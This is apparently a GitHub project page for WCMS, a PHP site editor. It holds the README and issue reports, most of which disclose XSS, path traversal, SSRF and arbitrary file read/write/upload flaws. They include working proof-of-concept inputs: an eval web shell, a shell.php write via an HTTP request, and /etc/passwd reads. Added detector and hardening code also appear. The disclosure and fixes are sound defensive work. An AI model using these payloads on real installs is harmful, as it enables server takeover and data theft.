
wcms's Introduction


WCMS


Your best friend when it comes to management of your sites

Site - wcms.space Russian guide - Youtube

If you like the plugin, consider ...

Buy me a coffee

Install:

  1. Download Files Click Here
  2. Extract zip to project root
  3. Change login/password in config.php
  4. Go to your-website.com/wex/

Features:

  • No database required
  • Add/Remove/Update all images
  • Add/Remove/Update all text
  • Add/Remove/Update all html/css/js files
  • Html/css/js online editor
  • File manager
  • One click backup
  • i18n (Russian and English by default)

Simple editing of all images

Simple editing of all text

Click Here - wcms.space

Documentation

Browse the online documentation here.

Contributing

  1. Fork it (https://github.com/vedees/wcms/fork)
  2. Create your feature branch (git checkout -b feature/fooBar)
  3. Commit your changes (git commit -am 'Add some fooBar')
  4. Push to the branch (git push origin feature/fooBar)
  5. Create a new Pull Request

Meta

Evgenii Vedegis – github / [email protected]

License

WCMS is Apache-2.0.

wcms's People

Contributors

egor7orlov, vedees

wcms's Issues

Reflected XSS vulnerability in wcms/wcms/wex/cssjs.php

Hi, dev team!

There is a reflected XSS vulnerability in the wcms/wcms/wex/cssjs.php file.

The vulnerable code is:

64: type='<?php echo $_GET['type'];?>'>

Example POC: just send any JS code in the type parameter, like: type=<script>alert()</script>

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.

To prevent XSS, use the following guide: https://portswigger.net/web-security/cross-site-scripting/preventing.

Please let me know about any fixes; I would like to register a CVE number.

BUG: An Arbitrary File Reading Vulnerability in wex/cssjs.php

An Arbitrary File Reading Vulnerability in wex/cssjs.php
There is a vulnerability that can read and modify any file to get a shell.
Affected software: WCMS V0.3.2

PoC:
Use ../ for the directory traversal vulnerability.
I can read config.php to get the admin account.
/wex/cssjs.php?path=..//wcms/config.php&type=css

I can still do it.

Now let's modify this file.

Click Save
Success!

So I can modify a PHP file to get a shell.
That access is without login.

Source code:
wex/cssjs.php
We can see there is no filtering of '../', which is what makes the directory traversal vulnerability.

Path Traversal vulnerability in wcms/wex/html.php

Hi, dev team!

There is a path traversal vulnerability in the wcms/wex/html.php file.

The vulnerable code is:

wcms/wex/core/classes/Pagename.php:16: $_SESSION['pagename'] = $_POST['pagename'];
wcms/wex/core/classes/Pagename.php:20: $GLOBALS['pagename'] = $_SESSION['pagename'];
wcms/wex/html.php:17: $html_from_template = htmlspecialchars(file_get_contents($GLOBALS['pagename']));
wcms/wex/html.php:51: :code='<?php echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);?>'

Example POC:

<?php

$pagename = "/etc/passwd";
$html_from_template = htmlspecialchars(file_get_contents($pagename));
echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);

?>

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files.

To prevent this vulnerability, use the following guide: https://portswigger.net/web-security/file-path-traversal (prevention section)

Please let me know about any fixes; I would like to register a CVE number.

Editing by the wcms-text class does not work

Hello, I created a paragraph with the class .wcms-text, and the option to edit it appeared in the Text section. After editing, the text is inserted at the very beginning of the document, not in the paragraph.

Update.
If you select Show tags in the settings, the edited text is inserted inside paragraph tags with the .wcms-text class, but again at the beginning of the document. On each subsequent edit a new paragraph is created instead of the existing paragraphs being edited.

SSRF Vulnerability in wcms/wcms/wex/html.php

Hi, dev team!

There is an SSRF vulnerability in the wcms/wcms/wex/html.php file.

The vulnerable code is:

wcms/wex/core/classes/Pagename.php:16: $_SESSION['pagename'] = $_POST['pagename'];
wcms/wex/core/classes/Pagename.php:20: $GLOBALS['pagename'] = $_SESSION['pagename'];
wcms/wex/html.php:17: $html_from_template = htmlspecialchars(file_get_contents($GLOBALS['pagename']));

Example POC:

<?php

$pagename = "ftp://127.0.0.1:8000";
$html_from_template = htmlspecialchars(file_get_contents($pagename));
?>

Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back-end server of a vulnerable web application. It can help identify open ports and local network hosts, and execute commands on services (for example redis, by using the gopher:// scheme).

To prevent this vulnerability, use the following guide: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

Please let me know about any fixes; I would like to register a CVE number.

Path Traversal vulnerability in wcms/wcms/wex/cssjs.php

Hi, dev team!

There is a path traversal vulnerability in the wcms/wcms/wex/cssjs.php file.

The vulnerable code is:

31: $path = $_GET['path'];
32: $html_from_template = htmlspecialchars(file_get_contents($path));
61: :code='<?php echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);?>'

Example POC:

<?php

$path = "/etc/passwd";
$html_from_template = htmlspecialchars(file_get_contents($path));
echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);

?>

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files.

To prevent this vulnerability, use the following guide: https://portswigger.net/web-security/file-path-traversal (prevention section)

Please let me know about any fixes; I would like to register a CVE number.

Security Contact

Hello maintainer(s),

I am a security researcher from the Institute of Application Security at TU Braunschweig, Germany. We discovered a (potential) security vulnerability in your project.

We would like to report this vulnerability to you in a responsible and ethical manner.
Therefore, we do not want to disclose any details of the vulnerability publicly until you have had a chance to review and fix it.

Could you please let us know your preferred way of receiving security reports?

You can contact us at [email protected] or by replying to this issue.

Thank you for your attention and cooperation.

SSRF Vulnerability in wcms/wcms/wex/cssjs.php

Hi, dev team!

There is an SSRF vulnerability in the wcms/wcms/wex/cssjs.php file.

The vulnerable code is:

31: $path = $_GET['path'];
32: $html_from_template = htmlspecialchars(file_get_contents($path));
61: :code='<?php echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);?>'

Example POC:

<?php

$path = "ftp://127.0.0.1:8000";
$html_from_template = htmlspecialchars(file_get_contents($path));
echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);

?>

Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back-end server of a vulnerable web application. It can help identify open ports and local network hosts, and execute commands on services (for example redis, by using the gopher:// scheme).

To prevent this vulnerability, use the following guide: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

Please let me know about any fixes; I would like to register a CVE number.

An Arbitrary File Upload Vulnerability in wcms/wex/finder/action.php

An Arbitrary File Upload Vulnerability in wcms/wex/finder/action.php

Affected software: WCMS V0.3.2
Type of vulnerability: Arbitrary File Upload
Discovered by: Yu Yang

Use the upload feature in the developer/finder:
and we can upload an arbitrary file to the web server; it allows attackers to upload malicious code.
POC (2.php):
<?php @eval($_POST[c]);?>
code:
I hope you can fix it.

Bug in wcms/wex/core/classes/text/Replace.php

I will write in Russian.
Bug in version 0.3.2
If the comments and the heading contain the same text value, the text is replaced in the comment but not in the heading. If the title contains the same text as the heading, it replaces the text in the heading; see the example file in public in my fork (https://github.com/cryptoprof/wcms/tree/feature/securityFix), you can copy it into your implementation. The function
str_replace_nth
works incorrectly. It walks through the whole text, including comments. In theory, indexes for HTML elements need to be added and the updates done by them. If I have time, I'll join in and try to finish it myself.
And yes, thank you for your work on the CMS :)

Reflected XSS vulnerability in wcms/wex/html.php

Hi, dev team!

There is a reflected XSS vulnerability in the wcms/wex/html.php file.

The vulnerable code is:

wcms/wex/core/classes/Pagename.php:16: $_SESSION['pagename'] = $_POST['pagename'];
wcms/wex/core/classes/Pagename.php:20: $GLOBALS['pagename'] = $_SESSION['pagename'];
wcms/wex/html.php:52: path='<?php echo $GLOBALS['pagename']; ?>'

Example POC: just send any JS code in the pagename parameter, like: pagename=<script>alert()</script>

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.

To prevent XSS, use the following guide: https://portswigger.net/web-security/cross-site-scripting/preventing.

Please let me know about any fixes; I would like to register a CVE number.
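A detection view of the reports above, added here as an example and not part of wcms or any of the reporters' posts: it scans Apache combined-format access log lines for the request shapes the issues describe (traversal sequences or URL schemes in the cssjs.php path parameter, markup in type, and a .php target in the html.php finish parameter). The log lines are constructed for the example; the function and constant names are my own.

```php
<?php
// Added example, not wcms project code: flag access-log requests matching the
// abuse patterns reported in the issues above (traversal and URL schemes in
// cssjs.php's path, markup in type, a .php target in html.php's finish).
// The log lines are constructed for this example, in Apache combined format.

const WEX_SUSPICIOUS = [
    'path'   => ['traversal' => '#(^|[/\\\\])\.\.([/\\\\]|$)#', 'scheme' => '#^[a-z][a-z0-9+.-]*://#i'],
    'type'   => ['markup' => '#[<>"\']#'],
    'finish' => ['php_write' => '#\.(php|phtml|phar)\b#i'],
];

// Returns one "script param=label" string per suspicious parameter in the
// request line, or an empty array. parse_str URL-decodes the values, so
// %2e%2e forms are caught too; double-encoded values are not.
function wex_findings(string $logLine): array
{
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $logLine, $m)) {
        return [];
    }
    $url = parse_url($m[1]) ?: [];
    if (!preg_match('#/wex/(cssjs|html)\.php$#', $url['path'] ?? '', $s)) {
        return [];
    }
    parse_str($url['query'] ?? '', $params);
    $findings = [];
    foreach ($params as $name => $value) {
        if (!is_string($value) || !isset(WEX_SUSPICIOUS[$name])) {
            continue;
        }
        foreach (WEX_SUSPICIOUS[$name] as $label => $re) {
            if (preg_match($re, $value)) {
                $findings[] = "$s[1].php $name=$label";
            }
        }
    }
    return $findings;
}

$sampleLog = [ // constructed sample lines
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wex/cssjs.php?path=..//wcms/config.php&type=css HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /wex/cssjs.php?path=ftp://127.0.0.1:8000&type=js HTTP/1.1" 200 12',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "POST /wex/html.php?finish=shell.php HTTP/1.1" 200 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /wex/cssjs.php?path=css/style.css&type=css HTTP/1.1" 200 900',
];
foreach ($sampleLog as $line) {
    foreach (wex_findings($line) as $finding) {
        echo "ALERT: $finding\n";
    }
}
```

The first three sample lines each produce an alert; the fourth, a normal stylesheet load, produces none. The POSTed pagename parameter of html.php never appears in an access log, so that report needs application-side logging rather than this check.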

Arbitrary file write vulnerability in /wcms/wex/html.php

Hi, dev team! The code in this file is vulnerable: arbitrary file write, and commands can be executed through this file.

Vulnerability discovery

Vulnerable code found on lines 20 to 23 in the /wcms/wex/html.php file:

if (isset($_GET['finish'])) {
    $path = $_GET['finish'];
    file_put_contents($path, $_POST['textAreaCode']);
}

Since the finish variable of the GET request and the textAreaCode variable of the POST request are controllable, an attacker can use the file_put_contents function to write malicious code into a custom file.

Construct PoC

Use the controllable variables to write malicious code into the shell.php file in the current directory.
The payload is as follows:

POST /wangmarket-master/wcms-0.3.2/wcms/wex/html.php?finish=shell.php HTTP/1.1
Host: 192.168.3.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=pdvblj8k9q6rin0oroe36m6s77
Upgrade-Insecure-Requests: 1
Content-Length: 36

textAreaCode=<?php system('whoami');?>

It can be seen that the write is successful.

Get shell

Access the written malicious file and find that the malicious code is successfully executed and its output echoed.
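The fix the cssjs.php and html.php reports on this page call for is the same in each case: refuse URL schemes, resolve the requested file inside the site directory, allowlist the extension, and encode anything echoed back. The block below is an added example of that hardening and is not wcms code; it assumes the script lives in wex/ directly under the site root, and safe_site_path and $siteRoot are names I chose.

```php
<?php
// Added example, not wcms project code: a hardened replacement for the
// unchecked $_GET['path'], $_GET['finish'] and $GLOBALS['pagename'] handling
// reported above. Assumes site files live under $siteRoot (an assumption).
// Resolve a user-supplied filename to a real path inside $siteRoot, or null.
// Refuses URL schemes (SSRF), ../ escapes (traversal) and unlisted extensions.
// For writes the file may not exist yet, so its directory is resolved instead.
function safe_site_path(string $siteRoot, string $userPath, array $allowedExt, bool $mustExist = true): ?string
{
    $root = realpath($siteRoot);
    if ($root === false || $userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $userPath)) {   // ftp://, gopher://, php://, data:
        return null;
    }
    $ext = strtolower(pathinfo($userPath, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;
    }
    if ($mustExist) {
        $real = realpath($root . DIRECTORY_SEPARATOR . $userPath);
    } else {
        $base = basename($userPath);
        $dir = realpath($root . DIRECTORY_SEPARATOR . dirname($userPath));
        $real = ($dir === false || !preg_match('/^[A-Za-z0-9_.-]+$/', $base)) ? false : $dir . DIRECTORY_SEPARATOR . $base;
    }
    // Containment: the resolved path must sit strictly below the site root.
    if ($real === false || strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Both handlers must also run only after the wex login check, which one report above says was not enforced.
$siteRoot = __DIR__ . '/..';   // assumption: this script lives in wex/ under the site root
// cssjs.php: allowlist the type, read only css/js below the root, encode on output.
$type = in_array($_GET['type'] ?? '', ['css', 'js'], true) ? $_GET['type'] : 'css';
$file = safe_site_path($siteRoot, $_GET['path'] ?? '', [$type]);
$html_from_template = $file === null ? '' : htmlspecialchars(file_get_contents($file), ENT_QUOTES, 'UTF-8');
echo "<div type='" . htmlspecialchars($type, ENT_QUOTES, 'UTF-8') . "'></div>";
// html.php: the "finish" save may only overwrite .html files below the root.
if (isset($_GET['finish'], $_POST['textAreaCode'])) {
    $target = safe_site_path($siteRoot, $_GET['finish'], ['html'], false);
    if ($target === null) { http_response_code(400); exit; }
    file_put_contents($target, $_POST['textAreaCode']);
}
```

With this in place the reported inputs all return null from safe_site_path: ..//wcms/config.php fails the extension allowlist, ftp://127.0.0.1:8000 fails the scheme check, /etc/passwd has no allowed extension, and finish=shell.php is refused because only .html targets may be written.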

Image path error with the picture tag | .webp

Hi! Great idea for a CMS! A pity it's still in beta. I'd like to ask for help:

In my markup, besides the img tag, I use the picture tag with source/webp and img/jpg. As a result the CMS cannot find the images, although it did find one jpg inside a picture tag on the main page, but not its duplicate in .webp format.

Screenshots attached. Thanks in advance!
